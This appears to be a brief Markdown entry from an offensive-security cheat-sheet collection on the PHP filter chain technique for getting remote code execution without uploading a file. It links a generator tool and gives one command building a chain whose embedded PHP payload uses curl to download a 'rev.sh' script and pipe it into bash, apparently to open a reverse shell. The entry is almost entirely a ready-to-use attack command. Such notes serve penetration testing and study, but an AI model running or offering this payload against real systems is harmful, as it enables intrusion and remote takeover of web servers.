killchain-compendium/Exploits/Web/PHP Filer Chain.md

8 lines
269 B
Markdown

# PHP Filter Chain Generator
* [Get RCEs without uploading by chaining filters](https://github.com/synacktiv/php_filter_chain_generator)
* Or by uploading a filtered file
```sh
./php_filter_chain_generator.py --chain '<?= `curl http://$TARGET_IP/rev.sh|bash` ;?>'
```